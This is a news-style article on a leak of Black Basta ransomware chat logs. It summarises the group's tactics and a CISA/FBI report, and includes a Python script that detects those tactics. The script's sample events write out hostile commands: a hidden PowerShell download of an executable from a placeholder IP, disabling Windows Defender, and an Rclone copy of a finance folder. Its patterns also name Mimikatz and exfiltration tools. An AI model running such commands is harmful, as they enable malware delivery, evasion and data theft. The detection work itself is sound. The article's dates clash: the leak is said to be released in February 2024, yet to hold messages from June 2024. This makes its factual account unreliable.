A significant leak of internal chat logs from the Black Basta ransomware group has provided cybersecurity researchers with unprecedented insight into their operations.
The leak, released on February 11, 2024, by a Telegram user named ExploitWhispers, contained approximately 200,000 chat messages dated between September 2023 and June 2024.
This event rivals the 2022 leaks that affected the Conti ransomware gang, shedding light on one of the most impactful ransomware groups in recent years.
Advanced Tactics and Techniques Revealed
Threat hunters at Intel 471 have updated their threat intelligence with newly uncovered Tactics, Techniques, and Procedures (TTPs) based on the leaked information.
Black Basta’s arsenal includes sophisticated reconnaissance tools, defense evasion techniques, and credential access methods.
The group utilizes discovery tools such as ifconfig.exe, netstat.exe, and ping.exe, while also abusing WMIC for system information gathering.
For defense evasion, Black Basta employs temp directories, abuses the Background Intelligent Transfer Service (BITS), and tampers with Windows Defender.
The group gains credential access through the notorious Mimikatz tool and establishes command and control via the AnyDesk application.
PowerShell abuse is prevalent for file downloads and execution, while data exfiltration is facilitated through the Rclone utility.
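As an added illustration of how the TTPs listed above can be turned into a host-level detection, the Python below maps each named behaviour (discovery binaries, WMIC recon, BITS abuse, Defender tampering, Mimikatz, AnyDesk, PowerShell download cradles, Rclone transfers) to a command-line pattern and flags hosts that show several distinct stages. This is example code written for this page, not Intel 471's or CISA's detection content; the regexes and the process-creation events are this example's own constructed assumptions, not indicators from the leak.

```python
import re
from collections import defaultdict

# One pattern per TTP named in the article. These are assumed command-line
# shapes for the purpose of this example, not indicators taken from the leak.
TTP_PATTERNS = {
    "discovery-tools": re.compile(r"\b(ifconfig|ipconfig|netstat|ping)\.exe\b", re.I),
    "wmic-recon":      re.compile(r"\bwmic(\.exe)?\b.*\b(os|computersystem|process)\b", re.I),
    "bits-abuse":      re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer|Start-BitsTransfer", re.I),
    "defender-tamper": re.compile(r"Set-MpPreference.*-Disable\w+", re.I),
    "mimikatz":        re.compile(r"mimikatz|sekurlsa::", re.I),
    "anydesk-c2":      re.compile(r"\banydesk(\.exe)?\b", re.I),
    "ps-download":     re.compile(r"powershell.*(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)", re.I),
    "rclone-exfil":    re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I),
}

def match_ttps(cmdline):
    """Return the set of TTP labels whose pattern matches one command line."""
    return {name for name, rx in TTP_PATTERNS.items() if rx.search(cmdline)}

def score_hosts(events, threshold=3):
    """Group (host, cmdline) events by host and flag hosts that exhibit at
    least `threshold` distinct TTPs. Counting distinct stages rather than raw
    hits keeps a noisy ping.exe loop from paging anyone on its own."""
    per_host = defaultdict(set)
    for host, cmdline in events:
        per_host[host] |= match_ttps(cmdline)
    return {h: sorted(t) for h, t in per_host.items() if len(t) >= threshold}

# Constructed sample process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws-042", r"C:\Windows\System32\ipconfig.exe /all"),
    ("ws-042", r"wmic computersystem get domain,name"),
    ("ws-042", r"powershell -nop -w hidden -c Invoke-WebRequest http://198.51.100.7/a -OutFile C:\Users\Public\temp\a.exe"),
    ("ws-042", r"powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("ws-042", r"C:\Users\Public\temp\rclone.exe copy C:\Finance remote:share --transfers 8"),
    ("ws-113", r"C:\Windows\System32\ping.exe -n 1 fileserver01"),
    ("ws-113", r"C:\Windows\System32\netstat.exe -an"),
]

if __name__ == "__main__":
    for host, ttps in score_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {len(ttps)} distinct stages -> {', '.join(ttps)}")
```

Only ws-042, which chains discovery, WMIC, a PowerShell download into a temp directory, Defender tampering and an Rclone transfer, crosses the threshold; ws-113's two discovery commands alone do not.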
Global Impact and Critical Infrastructure Targeting
A joint report from CISA and the FBI, released on May 10, 2024, detailed Black Basta’s major activities between April 2022 and May 2024.
During this period, the group targeted over 500 entities across North America, Europe, and Australia, affecting 12 out of 16 critical infrastructure sectors.
The report highlighted an increased risk to healthcare organizations, noting a surge in attacks targeting this sector due to its size and potential impact.
Black Basta operates under the Ransomware-as-a-Service (RaaS) model and is known for its double extortion tactic.
The group not only encrypts files on victims’ computers or networks but also threatens to publish exfiltrated data publicly.
This Russian-speaking, financially motivated group has targeted numerous countries worldwide, including the United States, Japan, Australia, the United Kingdom, Canada, and New Zealand.
The leaked information and subsequent analysis provide valuable insights for cybersecurity professionals and organizations to bolster their defenses against Black Basta and similar ransomware threats.
As ransomware attacks continue to evolve and target critical infrastructure, understanding the tactics and techniques employed by these groups becomes crucial for developing effective countermeasures and protecting vulnerable sectors.